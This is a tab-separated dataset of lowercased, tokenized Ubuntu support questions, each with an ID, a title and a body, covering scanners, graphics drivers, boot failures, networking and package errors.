404857	canon lide 30 with 12.04	i would like to use my old canon lide 30 scanner on ubuntu 12.04 . however , neither simple scan nor xsane recognise the scanner . nilsholgersson @ plina : ~ $ sane-find-scanner # sane-find-scanner will now attempt to detect your scanner . if the # result is different from what you expected , first make sure your # scanner is powered up and properly connected to your computer . # no scsi scanners found . if you expected something different , make sure that # you have loaded a kernel scsi driver for your scsi adapter . found usb scanner ( vendor=0x04a9 [ canon ] , product=0x220e [ canoscan ] , chip=lm9832/3 ) at libusb:002:002 # your usb scanner was ( probably ) detected . it may or may not be supported by # sane . try scanimage -l and read the backend 's manpage . # not checking for parallel port scanners . # most scanners connected to the parallel port or other proprietary ports # ca n't be detected by this program . # you may want to run this program as root to find all devices . once you # found the scanner devices , be sure to adjust access permissions as # necessary . nilsholgersson @ plina : ~ $ scanimage -l no scanners were identified . if you were expecting something different , check that the scanner is plugged in , turned on and detected by the sane-find-scanner tool ( if appropriate ) . please read the documentation which came with this software ( readme , faq , manpages ) . nilsholgersson @ plina : ~ $ scanning works well with vuescan free version ( but this adds a watermark and a license is $ 50 ) . can someone help ? thanks , philipp
404862	how can i reset my unity launcher settings ?	today i tried to change the alt+tab behavior of my ubuntu because i did not like the grouped layout . i tried two shell scripts i found in a git gist . my problem is that since i used those scripts the behavior of dash changed : when a program tries to notify me dash appears for me ( it is on auto-hide ) and the application icon shakes for 5 seconds and it is often followed by the freezing of that application . before i tampered with the settings it was shaking for only half a second and there were no freezing . how can i revert to the default settings ? i tried unity -- reset but i received error messages ( complaining about the lack of opengl and ending in a segmentation fault ) . i tried removing and reinstalling unity and compiz : apt-get remove unity -- purge apt-get remove compiz -- purge apt-get install unity apt-get install compiz but nothing changed . how can i reset to my previous state ( before running the scripts ) ? some of my apps are freezing ever since i ran them although i reverted the changes in the shell scripts .
404863	install nvidia drivers from .run provided by geforce.com	i am currently using the nvidia 319 drivers provided by ubuntu repos , but i want to use the 331 driver . the problem is the xorg edgers ppa i used to rely on , offers a broken 331 driver ( installs bumblebee , blacklisting the nvidia driver ) . i downloaded the .run driver provided by the website geforce.com for my nvidia gtx 760 , but i do n't know if the procedure i 'm thinking about is correct:1- command line boot2- sudo apt-get purge nvidia*3- sudo ./driver.run is this procedure correct ? thank you
404864	how to make title bar buttons invisible and visible on mouseover ?	the title bar buttons ( minimize , maximize/restore and close ) are normally visible at all times . i want them to be invisible all the time and visible only on mouseover . i am running ubuntu 12.04 lts with gnome shell 3.4
404869	firefox using 99 % cpu	i am using firefox 25.0.1 on ubuntu 12.10 . for last few days firefox is behaving very slowly . today i noticed that the firefox is using 99 % of the cpu capacity . i reset it to factory configuration but still the problem persists . how can i solve the problem ? thanks .
404872	ubuntu 11.3 is giving unable to locate package openjdk-7-jdk exception	i am using ubuntu 11.3 and i have installed it is e drive in my pc.so now i want to install java 7 for this os , i am using this command but it gives an exception to me ... sudo apt-get install openjdk-7-jdk reading package lists ... done building dependency tree reading state information ... done e : unable to locate package openjdk-7-jdk i am new in ubuntu someone please help
404878	display command on the command line	what does the command export display=:0on terminal do ? ? is it possible to change the number from 0 to some other value..
404879	brightness slider gone , and the brightness is constantly jittering	i 've just installed a clean version of 13.10 on my msi u123 . before i 've used 12.4 without a hitch . as soon as i entered the brightness and lock settings window the brightness starts to flicker and jitter uncontrollably and the brightness slider is gone . the function keys still work , but the jittering is `` stronger '' and will keep on jittering . also the `` brightness changed '' notification does n't go away , but i guess that 's intentional seeing as how the brightness is constantly changing .
404880	what 's ubuntu 's app development ide ?	what 's ubuntu 's official ide used to develop applications ? which language is preferred for ubuntu apps ?
404881	how do i install an asus usb-ac56 wifi adapter ?	i 'm trying to get this asus usb-ac56 adapter installed on ubuntu 12.04 , but when i try to extract the linux file from the cd , it says i do n't have the right permissions to extract . i tried downloading the driver from the asus website but i ca n't install it . i do n't know the proper syntax . can anyone help me out ?
404882	usb headset trouble	i 'm having troubles with my usb headset . felipe @ ubuntu : ~/builds $ aplay -l aplay : device_list:268 : no se encontraron tarjetas de sonido ... felipe @ ubuntu : ~/builds $ sudo aplay -l [ sudo ] password for felipe : **** lista de playback dispositivos hardware **** home directory not accessible : permiso denegado tarjeta 0 : generic [ hd-audio generic ] , dispositivo 3 : hdmi 0 [ hdmi 0 ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 tarjeta 1 : nvidia [ hda nvidia ] , dispositivo 0 : alc662 rev1 analog [ alc662 rev1 analog ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 tarjeta 1 : nvidia [ hda nvidia ] , dispositivo 3 : hdmi 0 [ hdmi 0 ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 tarjeta 3 : headset [ hp digital stereo headset ] , dispositivo 0 : usb audio [ usb audio ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 i have tried editing /etc/modprobe.d/alsa-base.conf felipe @ ubuntu : ~/builds $ cat /etc/modprobe.d/alsa-base.conf # autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 # cause optional modules to be loaded above generic modules install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # # workaround at bug # 499695 ( reverted in ubuntu see lp # 319505 ) install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use-blacklist snd-seq-oss ; : ; } # install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } # cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } # prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 # ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 # keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 # keep snd-usb-audio from beeing loaded as first soundcard options snd-usb-audio index=0 options snd-hda-intel index=-2 works , but 1 of 3 boot recognize the card ... the trouble is not all aplication use the usb headset , for example half life 2 and audacity and firefox , so because of that i had changed the alsa-base.conf , making the usb card index to 0 to be the prefered card number 0 and to get all of my apps using my usb headset ... but this not work always
404884	xubuntu format a micro sd with custom ( unusual ) cluster size	i must format a 32gb micro sd . i must make a partition fat32 , with a boot flag and cluster size = 1816byte . i have tried with mkfs.msdos , gparted and fdisk but i ca n't do that because of errors about `` invalid block size '' . i know that is not a valid block size but i must use that numbers of byte . how can i do ?
404885	ubuntu mult-seat on onboard apu	would it be possible to setup a multiseat based on an a10 5800k apu ? what i 'd like to accomplish is ubuntu on my main screen , and xbmc on my second screen . there needs to be no input device for xbmc , we control everything with our phones via wifi . so perhaps a dual-screen setup would work , as long as i can set it so that nothing interacts with xbmc , and i get seperate audio on xbmc and desktop . i 'd prefer to do all this via the onboard apu , to save on poser usage and cost of second card . tv would be connected via hdmi , main screen via displayport , both of which support audio .
404888	apache - action 'graceful ' failed	i 'm trying to install an app ( vatic - http : //web.mit.edu/vondrick/vatic/ ) and i need to change the apache configuration file , according to guide that i have ( readme - https : //raw.github.com/cvondrick/vatic/master/readme ) i write in the file this lines : < virtualhost *:80 > servername vatic.domain.edu documentroot /path/to/vatic/public wsgiscriptalias /server /path/to/vatic/server.py customlog /var/log/apache2/access.log combined < /virtualhost > and after this i need to run the commands : $ sudo cp /etc/apache2/mods-available/headers.load /etc/apache2/mods-enabled $ sudo apache2ctl graceful but after the second command i get the error : '' syntax error on line ... of /etc/apache2/sites-enabled/000-defult.conf : < /virtualhost > without matching < virtualhost > section action 'graceful ' falied . the apache error log may have more infomation . '' can someone please help me with this error thanks
404889	how to install ruby backport on 12.04	the following commands do not work : apt-get install ruby1.9.3 installs 1.8.7 as specified by ruby -- version apt-get install ruby/trusty is held back with : ruby : depends : ruby1.9.1 ( > = 1.9.3.194-1 ) but 1.9.3.0-1ubuntu2.8 is to be installed
404890	why ca n't i install nvidia driver on ubuntu 12.10 ?	i did the following link to install nvidia driver on ubuntu 12.10 http : //ubuntuforums.org/showthread.php ? t=813931 & highlight=nvidia # post_5086971 but i do n't know why i get error `` installation failed '' . i have to notice that i did n't found xorg.conf in the 6th step here is my installation log from nvidia-installer.log file : nvidia-installer log file '/var/log/nvidia-installer.log' creation time : mon jan 13 19:28:43 2014 installer version : 331.20 path : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin nvidia-installer command line : ./nvidia-installer using : nvidia-installer ncurses user interface - > license accepted . - > installing nvidia driver version 331.20 . - > running distribution scripts executing : '/usr/lib/nvidia/pre-install ' ... - > done . - > the distribution-provided pre-install script failed ! continue installation anyway ? ( answer : yes ) - > performing cc sanity check with cc= '' cc '' . error : unable to find the kernel source tree for the currently running kernel . please make sure you have installed the kernel source files for your kernel and that they are properly configured ; on red hat linux systems , for example , be sure you have the 'kernel-source ' or 'kernel-devel ' rpm installed . if you know the correct kernel source files are installed , you may specify the kernel source path with the ' -- kernel-source-path ' command line option . error : installation has failed . please see the file '/var/log/nvidia-installer.log ' for details . you may find suggestions on fixing installation problems in the readme available on the linux driver download page at www.nvidia.com .
404891	dualboot windows 8 and ubuntu on seprate hdd	i have a question on dualbooting windows 8 and ubuntu . my pc has an 8gb ssd that has windows 8 on it and a 1tb hdd for data.i just want to know how this will affect dualboot . can i just split my 1 tb drive and add ubuntu as i would for a pc with only 1 hdd ? thanks
404894	hidden interface configuration ?	during installation of ubuntu server 13.04 , i configured the primary ethernet interface . this interface is visible in the /etc/network/interfaces file . the system has two additional interfaces which i do not have configured . nothing in the /etc/network/interfaces file . when i do ifconfig , i see all three ethernet interfaces . the one which i have configured during the installation process and this is part of /etc/network/interfaces and the two other ethernet interfaces . these two other interfaces are configured with dhcp . who has configured these interfaces ? ubuntu ? what will happen when i will edit these two interfaces in the /etc/network/interfaces file ? i only uses the commandline , no gui !
404895	send sms with active modemmanager	i 've been trying to send sms while my modem 3g sierra mc7700 is connected . seems that existis conflicts because the modemmanager use the only at interface . looking for a solution i found that modemmanager 1.0.0 has a program that can send sms while is connected , mmcli . the problem is that ubuntu has modemmanager 0.6.0 which has n't mmcli . i tried to compiled 1.0.0 but i could n't make it work . any ideas ?
404897	yet another `` computer wo n't boot from ubuntu install media '' question	i 've been banging my head against a wall . i have an older machine with a gigabyte p35-ds3l motherboard . for some reason it 'll boot other installs from usb and cd/dvd-rom , but not ubuntu . ( tried from both usb and cd/dvd-rom with same results . ) it just hangs shortly after post after detecting pci devices , the last thing in the list is acpi . normally after that it would say something about dmi pool , but it just hangs there before the dmi pool thing . i understand this is anecdotal , just offering as a frame of reference were the boot process hangs . it 'll boot windows 7 installer from usb along with several other random `` start-up '' utilities but not ubuntu . i 've also confirmed that the same usb sticks ( i 've tried several ) do work in my other machines . the other pc 's boot from the ubuntu usb media just fine , so i know the mbr and boot `` stuff '' is there and working . one such machine is also an older gigabyte ud3p based board . another machine is a much newer uefi based asrock ext3gen3 board . just wo n't work on the ds3l for some reason ? i 've spent many hours pouring over bios settings , using f12 boot menu , trying different methods of creating the bootable usb sticks ( both unetbootin and universal usb installer , etc etc ... ) also have tried re-downloading the iso files several times , all of which worked fine on the other machines . any thoughts or ideas ?
404898	32-bit application ( timeedition ) stopped working on new hardware	i got a new laptop and copied the partitions of the old harddisk onto the new one ( / and /home ) and everything works , except 1 application that wo n't start anymore . it is an old ( 2009 ) time tracker called timeedition ( http : //downloads.sourceforge.net/timeedition/timeedition1.1.6-linux.tgz ) which i have been using on various ubuntu versions from somewhere around version 9 or 10 up till 13.10 x64 . so far , i always managed to get it working , also on 64-bit architecture , first with the help of ia32-libs etc. , on 13.10 with the default multiarch and libstdc++5 . now nothing has changed , as far as i can tell , except the new hardware , but it refuses to start , giving this error : gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' segmentation fault ( core dumped ) i googled for answers and found esp . this thread , but to no avail : http : //ubuntuforums.org/showthread.php ? t=1956802 i also tried a fresh install of ubuntu 13.10 on the new machine , but after resolving all dependencies shown with 'ldd timeedition ' i get to the exact same situation . any ideas what can be the cause and how to solve this ?
404899	how do i make a sh file for running my software automatically ?	i want to make a sh file on my desktop to run a software for example `` kerio-kvc '' i made a sh file on my desktop with this content automatically # ! /bin/bash sudo /etc/init.d/kerio-kvc start but when i run it , the file needs password . so i did somethings else . but none of them worked . i want to make a shortcut in my desktop for execute a software without need for root password . how i have to do this ?
404900	which bit ubuntu os for me ?	i have windows xp sp3 and kingston 2gb ram module . i do n't know much difference between 32 bit os of ubuntu and the 64bit one . which one should i download ?
404902	do i need an antivirus ? will mcafee work on ubuntu ?	i want to know if mcafee anti virus and firewall will work on ubuntu 12.04.3 if not what is recommended . i have noticed web pages locking and reporting fbi virus , if ubuntu is safe how does my browser lock until i restart my computer
404904	change default keyboard settings without root access	after not having logged into ubuntu for a few weeks , i booted in to do some updates . i rebooted my computer to find out that my default keyboard settings have been changes , making it impossible to type in my password into the login box ( it uses some strange characters that you wo n't find on a qwerty ) . i currently only have access to the guest login , and i 'm using kde/kdm to login . how do i change the default keyboard settings without root/sudo access ?
404908	are there any official counters which keep a track on the number of downloads of a particular ubuntu version across different derivatives ?	are there any official counters which keep a track on the number of downloads of a particular ubuntu version across different derivatives ? if there are no official counters , is there any source which would help me make a reliable estimate about the number of downloads ? i need this information for my project , specifically for ubuntu 13.10 .
404913	how to batch rename	i want to batch rename files i have a folder and in that folder there are files that i want to change name to 1,2,3,4,5,6 etc.. thank you for your time
404914	xine stopped working suddenly : `` no vdpau implementation ''	i do n't watch that much video , but i could swear that sometime within the last couple of weeks i 've watched an old video or two . just now i tried to start xine ( which i 've been using for years ) and i got this : this is xine ( x11 gui ) - a free video player v0.99.7 . ( c ) 2000-2010 the xine team . failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory vo_vdpau : ca n't create vdp device : no vdpau implementation . [ wmv3 @ 0x7f03f4002c80 ] extra data : 8 bits left , value : 0 x error of failed request : badalloc ( insufficient resources for operation ) major opcode of failed request : 149 ( xvideo ) minor opcode of failed request : 19 ( ) serial number of failed request : 2700 current serial number in output stream : 2701 i can get it to `` work '' by starting it with -v opengl but it looks terrible . the `` xshm '' driver works somewhat better , but it stutters a lot . for all the other drivers listed by xine -- help , it just exits . i do n't know how/why it 's trying to use an nvidia driver ; i 'm on a laptop with intel graphics . here 's what xine -- help shows : -v , -- video-driver < drv > select video driver by id . available drivers : vdpau aadxr3 dxr3 xv xdirectfb directfb raw opengl caca xshm aa xxmc none sdl fb xvmc i just did a system update and nothing 's obviously wrong . what 's the `` good '' driver for intel hardware ? edit i 'm on 13.04 btw .
404917	13.10 on lenovo z61p , flash videos laggy and overheating	i recently installed ubuntu 13.10 on my lenovo thinkpad z61p , which should have decent graphics , still flash videos on youtube etc . especially in fullscreen are dark and laggy . also i always get an error window that a system problem has occured , and my laptop overheats after an hour or so ( but that might be a hardware problem ) .i searched the interwebz for quite a bit but it want help me : ( . please help and thank you in advance : )
404918	could not connect to wicd dbus interface	i get the following error when i start my computer , `` could not connect to wicd dbus interface '' . what can i do ? my internet is gone and everything i find online doesnt work , all i get is more errors . //k the solution was to delete wicd , but now a new problem comes up ; cant reboot , it just says `` waiting for network configuration '' 60 seconds more and goes to blank screen . i cant even go in recovery mode .
404920	how do you run a program in the terminal	i have to open a program called vbox , and some other specific programs related to that.there is also a program called libquantum . however these programs have to be run from a terminal . what is the specific command and syntax to run these programs ? i do not have much experience with an ubuntu terminal .
404921	ubuntu 13.04 package manager error	this error started to appear . any assistance would be great . thanks . e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_atareao_atareao_ubuntu_dists_raring_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ raring/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_raring_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ raring/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_raring_partner_binary-i386_packages )
404929	node : command not found	i do n't understand why the node command will not work , whereas nodejs works : $ node -- version zsh : command not found : node $ nodejs -- version v0.10.15 i tried apt-get install nodejs , but the latest version is already installed . and furthermore : $ npm zsh : command not found : npm i thought npm was included in nodejs > 0.10 ?
404930	how do you resolve unmet dependencies when trying to install exuberant ctags for ubuntu 12.04 ?	how do you resolve the following unmet dependencies when trying to install exuberant ctags on ubuntu 12.04 ?
404933	what version of theora is ffmpeg using	i have compiled the recent version of ffmpeg with the support for theora encoding with libtheoa . does anyone knows what version of theora is ffmpeg going to be using ? is it 1.1.1 or 1.2.0 alpha ? i have compiled ffmpeg and sadly i could not find the version that ffmpeg is using and i doubt that it is using the 1.2 version however i found a ffmpeg binary file that is using theora 1.2 alpha version ffmpeg2theora 0.29
404936	xubuntu/xfce : is it possible to have email notification in the system tray ?	the title says it all . i want to be notified in the tray .
404937	is it possible to add personalised composite key combinations to unity ?	i think that there are some gaping holes in what composite key combinations currently exist . for example : while ( comp ) /o produces ø and ( comp ) co gives ǒ for some reason ( comp ) : o does not produce ö . also while happy and sad smiley are being made , smirk is not available . i would like to be able to define my own composite key sequences , and ( hopefully ) share my config online so that it becomes a standard .
404938	ubuntu dual-boot inatallation	i am completely new to the ubuntu and it 's community . i am trying to install dual boot ( win7/ubuntu ) on my laptop . for that i created a 20 gb partition using windows inbuilt partition tool ( disk management ) . first i tried with wubi : - the installation completes without a glitch , but when i restart my machine and select ubuntu from boot selection screen it shows '' wubildr.mbr is missing or corrupt '' . so i am not able to use this installed ubuntu . on second attempt i ( uninstalled wubi and ) formatted this ( 20gb ) drive and tried with liveusb : - i selected try ubuntu option . first of all it did not detect my win 7 ( and showed only 2 option ) , so i went with something else option , then it showed ubi-partman failed with exit code 141 popup . still i continued the installation ( without specifing it the installation drive ! ) wherein it freezes at the slideshows and nothing happens and after restart i did not see any ubuntu file . i search on net about all errors mentioned above . i tried enabling/disabling intel virtualization technology . i ran boot-repair utility ( when booted throubh liveusb ) , it shows efi mode detected please select checkbox and nothing comes on that pop up for selecting . the report link is - http : //paste.ubuntu.com/6745876/ i deleted and created the 20gb partition using gparted and tried the installation , still no luck . with wubi installation on my machine , i tried refind boot manager as said in - how can i fix ubuntu winboot wubildr.mbr missing error ? this did not detect my ubuntu installation and gave only one boot option . i also tried to install with virtual box . i am almost on the verge of giving up having ubuntu . please help me .
404941	transfer file that keeps changing by having new lines appended	so i have a windows computer that is continuously collecting data for a physics experiment . the data is saved in a text file for which each new event is appended in a new line . every-time i need to re-analyse the data i transfer the file to a ubuntu computer by ssh , this is fine at the beginning but when the file passes the 1gb it starts to be really time consuming to transfer the hole file again and again , when only the last lines are different . to give you an idea the experiments runs for around 3h , transfer takes ~5min per gb , files have typically a max of 3gb and files have a line number in the order of the tens of million . in case you have a solution that works only for a linux to linux transfer i am also interested , maybe i can try it with cygwin .
404942	ubuntu 12.04 & 13.10 wo n't boot from usb pen	i tried with both 32bit versions , 12.04 & 13.10 , but none of them will boot . i create the usb drive with pendrivelinux , i pick the destro , iso , format and go . as mentioned below , i also tried unitbootin and lili , but same result . when machine turns on it does n't matter if i use f12 or go through bios . when it tries to boot it shows one line of text for less than a sec , then goes on to a blinking _ in the top left corner and then nothing happens until i shut it down . i 'm using a packard bell dot se , aka netbook with win7 .
404949	how to mount btrfs with `` errors=remount-ro '' equivalent ?	btrfs does not appear to support errors=remount-ro . in /etc/fstab , what option can i use with btrfs to achieve equivalent result as `` errors=remount-ro '' ?
404954	cmake does not create executable on external partition	building a simple pcl package : documentation - point cloud library ( pcl ) the only change i have made is to the title and the input pcd file . my dir structure is : cip_input - > cip_input.cpp ; cmakelists.cpp ; /build ; i run cmake .. in /build with the option to save the executable in bin folder all cmake .. and make run perfectly . i get a bin file but its not executable - and i cant chmod it - it wont let me - therefore i can not run the program and carry on with my life . help please . edit : this sounds crazy.. but am doing the development on an external drive - when i move my code to my desktop or home directory - it builds and i get the executable.. any reason as to why ? so.. i managed to solve it - it had to do with where i was building the code - it can not be done on an external drive of any kind..
404958	alternative to paperwork	i am looking for an alternative to the program paperwork as it is rather complicated to install under ubuntu . i am specifically interested in finding a way to read dates , prices and other details from scanned invoices and store everything in a kind of database or at least excel sheet . thanks for your help !
404959	pc wo n't boot from the first time	when i try to start my laptop all i see is a black screen ( not even the window that show the brand ... ) and the power light is on . and i have to unplug the power , then plug it again to make it start.. in other words i have to start it the first time ( nothing happen ) unplug it then plug it to make it start ... this happen every time note : i have dual boot with ubuntu 13.10 ( gnome ) and windows 7
404962	how to protect my pc from netcut users ? ( arp spoof )	in my campus , some people they are using netcut in windows and they are blocking us not to use internet . since i am a ubuntu user , i ca n't install neither nutcut nor netcut-defender to protect and even i tried tuxcut . it 's is also not working properly . can any one give me the right solution for this ?
404969	error : `` net.core.wmem_default '' is an unknown key on juju local provider	i create and deploy hpcc charm on local provider . for single node it run ok. for multiple nodes after configure the cluster one of the component fails to start with error : /proc/sys/net/core/rmem_max value 0 is less than 131071 exception : ( 1455 ) : system socket max read buffer is less than 131071 i try to set net.core.rmem_max with sysctl but got error `` net.core.rmem_max '' is an unknown key i notice there is no rmem_max under /proc/sys/net/core/ for local provider . how can i work around this problem ?
404970	why do flash games load larger than their boundaries ?	lots of flash games do this . it 's like the content is anchored to the top left corner of the flash element , but the element is n't quite big enough -- so stuff on the right and bottom edges of the game screen is obscured . makes some games unplayable . i 'm using 13.10 , and this problem happens in both chrome and firefox .
404973	installing persistent ubuntu on a local hard drive using livecd	i am absolutely new to linux and ubuntu , so i would like to spend some time to try ubuntu before a full installation . i have read a few pages about livecd with persistent image and i have found it quite useful for my purpose ( which is trying ubuntu and , especially , its applications without messing with my laptop 's windows 7 ) . using the method explained in here , i have created an ubuntu usb flash drive ; however , i have seen that the os is extremely slow in doing ordinary things ( even web surfing , which leads to temporary gray screens in firefox ) . my question is if i install ubuntu in such a way that the persistent image stays in one of the local partitions of the hard drive ( instead of the usb flash drive ) , would it resolve the problem , or running os from usb drive will result in a very slow os anyway ? also , i am not sure how i can install ubuntu on a flash drive and have one of local partitions on the hard drive be the persistent image . so , any help regarding that will be also appreciated . thanks , soheil
404977	remmina rdp - no sound from remote windows 7 computer - ubuntu 13.10	i 'm connecting to a windows 7 computer from ubuntu 13.10 . i have the sound setting in the advanced tab of the remote desktop preferences for my connection set to `` local - low quality '' . in my remote desktop session , if i go to the sound controls under the playback tab , i see that `` no audio devices are installed '' . does anyone know of a way to get the audio from my remote windows 7 computer to my ubuntu 13.10 computer ? thanks !
404979	can not boot into new ubuntu install ( 12.04 ) . `` gave up waiting for root device ''	background laptop is a compaq presarrio cq61 new 32gb ssd ( crucial v4 ) i 'm a ubuntu n00b ( after playing with a live usb , this is my first attempt at installing ) partion a=16gb for windows , 8gb for ubuntu and 8gb ntfs partition intended for shared files ( was following this guide ) installed windows 7 home premium sp from downloaded msdn installed ubuntu* from linux live usb made from a 32-bit 12.04 image ( i ca n't remember exactly which ) booting : now when booting i see the boot menu , and the windows 7 option loads fine . however ubuntu normally hangs with a 'purpleish ' screen , but no logo or anything . booting in the recovery mode gives a `` gave up waiting for root device '' error . i tried 'exit ' from the initramfs prompt which did not work ( i.e . after a delay ) . i tried boot repair tool run from my linux live key with no help , but the boot info can be found here ( sda is the live key , sdb the ssd ) found a lot of `` gave up waiting for device '' errors online , but the only consistent advice about rootdelay does n't seem to of helped . in desperation i tried running linux 3.2.x via the 'previous versions ' option on grub and this works . question can anyone help fix the default boot ( linux 3.8.x ? ) - or should i just stick with the 'previous version ' that seems to work ?
404982	is there specific install instructions , or ubuntu version for install to a flash drive ?	what version of ubuntu can i install onto a usb 3.0 flash drive so that i can boot directly from it and take no chance of affecting , in any way , my windows xp/windows 7 multi-boot ( its boot sector or anything else ) ? i do n't want grub or anything else from linux on any of my hard drives . are there any install instructions , specific to doing this , that you can direct me to ? thanks .
404984	why does n't this shell script work ?	i am trying to create a simple script which will resize images . here it is : # ! /bin/bash echo `` script executed from : $ { pwd } '' # copy image and resize it output_img= '' newimg.png '' path= '' $ { pwd } / $ { output_img } '' cp `` $ 1 '' $ { output_img } mogrify -resize 400x300 $ { path } i am calling script with 1 parameter ( image to be resized ) script thisimage.png but i get error cp command not found and mogrify command not found . all this works without a script meaning that i have installed all these apps . any ideas ?
404988	shotwell auto import issue	i am trying to auto-import for the first time a very large pictures folder with shotwell . though , it restarts my ubuntu 13.10 while importing the library . to troubleshoot this i start shotwell as $ shotwell_log=1 shotwell and then from ~/.cache/shotwell/shotwell.log i get the following at the end of the log l 2159 2014-01-13 20:14:00 [ dbg ] batchimport.vala:1967 : importing /home/case/pictures/2012/some folder ( something ) /img_2048.jpg l 2159 2014-01-13 20:14:00 [ wrn ] directory image , entry 0x0111 : strip 0 is outside of the data area ; ignored . ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ can somebody help me understand why my ubuntu is restarting ? ?
404991	lost visudo - i seem to have lost visudo , to my great surprise	lost visudo i seem to have lost visudo , to my great surprise . i 'm trying to add to /etc/sudoers or /etc/sudoers.d but when i try and run visudo as root i get this sudo : visudo : command not found when i search i get this whereis visudo visudo : /usr/share/man/man8/visudo.8.gz so the packed file is there but for some reason was either not unpacked or has been lost . sudo works fine . if i try visudo as a command i get this visudo the program 'visudo ' can be found in the following packages : * sudo * sudo-ldap try : sudo apt-get install < selected package > i 'm unsure if trying sudo apt-get install sudo will solve the problem or just give more problems .
404992	unable to access certain files in ubuntu ?	i have files in my ubuntu install that say i am not the owner or do i have the proper permissions to change anything about them . i completely formatted my hard disk before the ubuntu installation and told it to use the entire drive for the logical volume . can my problem be fixed without completely reinstalling ubuntu ? i 'm also having network issues , like extremely slow internet and lots of timeouts . please help me ! i 'm new to ubuntu and i like it and want to learn how to use it .
404998	bypass ntfs checking during boot in grub	i want to boot a linux live iso from usb . the usb stick is built correctly , works like charm under normal conditions . if i want to boot on a machine with hibernated windows 8 on it , the boot fails , complaining on the hibernated system on the ntfs partition ( ntfs-3g ) i know , one solution would be to turn off `` fastboot '' option in windows but i do n't want to do that . is there a way to turn off ntfs checking in grub during boot ? i know it is dangerous for the windows but i wont touch it , i do n't want to mount that partition . i just want to use my usb live distro .
